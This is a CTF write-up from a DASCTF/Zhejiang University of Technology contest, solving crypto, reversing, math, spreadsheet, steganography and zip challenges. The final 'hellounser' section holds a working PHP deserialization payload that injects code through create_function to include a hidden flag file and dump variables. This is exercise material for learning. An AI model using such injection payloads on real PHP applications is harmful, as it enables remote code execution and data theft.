DASCTF Sept X Zhejiang University of Technology Autumn Challenge

Last updated: 2 years ago

Participants:

  1. 雪晴师傅
  2. m1n9yu3

Sign-in

Original challenge from the Wangding Cup (网鼎杯), Qinglong group: https://tieba.baidu.com/p/6671953167

# SageMath: solve m^e = c (mod 2^256) for the exponent e
m = 73964803637492582853353338913523546944627084372081477892312545091623069227301
c = 21572244511100216966799370397791432119463715616349800194229377843045443048821
n = 2**256

e = discrete_log(mod(c, n), mod(m, n))

print(e)

e = 34852863801130149185238904762083023615101

b'flag{DASCTF_zjut}'
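Why the discrete log above is cheap: the multiplicative group modulo 2**256 has power-of-two order, so the exponent can be recovered one bit at a time. The following is an added example in plain Python, not code from the original post; `dlog_pow2` and `int_to_bytes` are hypothetical helper names, and it assumes the base is congruent to 5 mod 8 and the target to 1 mod 4, which holds for the m and c above.

```python
# Added example: discrete log modulo a power of two by lifting one bit at a time.
# m, c and the 2**256 modulus are the values from the write-up; dlog_pow2 and
# int_to_bytes are hypothetical helper names, not Sage functions.

def dlog_pow2(base: int, target: int, t: int) -> int:
    """Return e in [0, 2**(t-2)) with base**e == target (mod 2**t).

    Assumes base % 8 == 5, so base generates the cyclic subgroup of
    residues congruent to 1 mod 4, which has order 2**(t-2).
    """
    if t < 3 or base % 8 != 5:
        raise ValueError("need t >= 3 and base congruent to 5 mod 8")
    if target % 4 != 1:
        raise ValueError("target is not in the subgroup generated by base")
    e = 0
    for j in range(t - 2):
        mod = 1 << (j + 3)
        # base**e already matches target mod 2**(j+2); bit j of e decides
        # whether it also matches mod 2**(j+3).
        if pow(base, e, mod) != target % mod:
            e |= 1 << j
    if pow(base, e, 1 << t) != target % (1 << t):
        raise ValueError("no discrete log found")
    return e


def int_to_bytes(value: int) -> bytes:
    """Big-endian byte string of a non-negative integer."""
    return value.to_bytes((value.bit_length() + 7) // 8, "big")


m = 73964803637492582853353338913523546944627084372081477892312545091623069227301
c = 21572244511100216966799370397791432119463715616349800194229377843045443048821

if __name__ == "__main__":
    e = dlog_pow2(m, c, 256)
    print(e)
    print(int_to_bytes(e))
```

The loop does 254 modular exponentiations in total, which is why a power-of-two modulus gives no protection to the exponent.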

ea5ycpp

Guessed it directly.

d = [0x68, 0x6F, 0x65, 0x6C, 0x81, 0x69, 0x7A, 0x3D, 0x3B, 0x79,
     0x6B, 0x73, 0x38, 0x39, 0x7B, 0x70, 0x7B, 0x48, 0x73, 0x7C,
     0x85, 0x47, 0x7C, 0x96]
# Undo the transform: each byte was shifted up by 2 plus its index
for i in range(len(d)):
    print(chr(d[i] - 2 - i), end='')

pig_brain_king

Clicked 1000 times and was exhausted, so I just patched the place that checks whether you succeeded.

Then frantically press 1 followed by Enter.

easy_math

#!/usr/bin/python3
# coding = utf-8
from z3 import *

s = Solver()
# Four unknown integers recovered from the challenge's checks
x = Int("x")
y = Int("y")
z = Int("z")
c = Int("c")
s.add(x - c == 107010778014077)
s.add(y - c == 379654844783)
s.add(z - c == 104686361407310)
s.add(c + z + y + x == 212351672173114)
s.check()
print(s.model())

Solve the equations directly with z3 to get the values.

Then concatenate them.

flag{he11o_F1boNacci!}

Girlfriend’s account

Two payloads

=SUM(ISNUMBER(SEARCH(TEXT({1,2,3,4,5,6,7,8,9},"[dbnum2]"&{"0亿";"0仟!*万";"0佰!*万";"0拾!*万";"0万";"万!*0仟";"万!*0佰";"万!*0拾";"0元";"0角";"0分"}),IF(ISERR(FIND("万",A2)),"万",)&A2))*{1,2,3,4,5,6,7,8,9}*10^{8;7;6;5;4;3;2;1;0;-1;-2}) 

=IF(B3="壹",1,IF(B3="贰",2,IF(B3="叁",3,IF(B3="肆",4,IF(B3="伍",5,IF(B3="陆",6,IF(B3="柒",7,IF(B3="捌",8,IF(B3="玖",9)))))))))

flag{12305926.36}

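Blind in Both Eyes, Disabled in Body but Strong in Will (双目失明,身残志坚)

Extract the blind watermark, then use a pinyin-to-Braille lookup table.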

zh e j iang g ong ie d a x ue

flag{zhejianggongyedaxue}

ZipBomb

For this challenge I asked 雪殇师傅.

import os
import zipfile

dir_path = 'C:\\Users\\Snowywar\\Desktop\\zipBomb'
files = os.listdir(dir_path)
newfiles = files[::-1]
print(newfiles)
for file in newfiles:  # iterate over the folder
    # build the absolute path; in "\\" one backslash is the escape character
    position = dir_path + '\\' + file
    print(position)
    with zipfile.ZipFile(position, 'r') as z:
        for filename in z.namelist():
            data = z.read(filename)
            # 'Zmxh' is the Base64 encoding of 'fla'
            if b'Zmxh' in data:
                print(filename)

flag{F!nD_Fl4g_1n_2IP_13OMB}

hellounser

payload

<?php
/**
 * @Author: ying
 * @Date: 2021-09-25 13:41:23
 * @Last Modified by: ying
 * @Last Modified time: 2021-09-25 20:42:24
 */
class A {
    public $var;
    public function __construct(){
        $this->var = new B();
    }
}
class B{
    public $func;
    public $arg;
    public function __construct(){
        $this->func = "create_function";
        // $this->arg = "}var_dump(get_defined_vars());//";
        $this->arg = "}require(base64_decode(VHJ1M2ZsYWcucGhw));var_dump(get_defined_vars());//";
    }
}
echo urlencode(serialize(new A()));


This gets it in one shot.

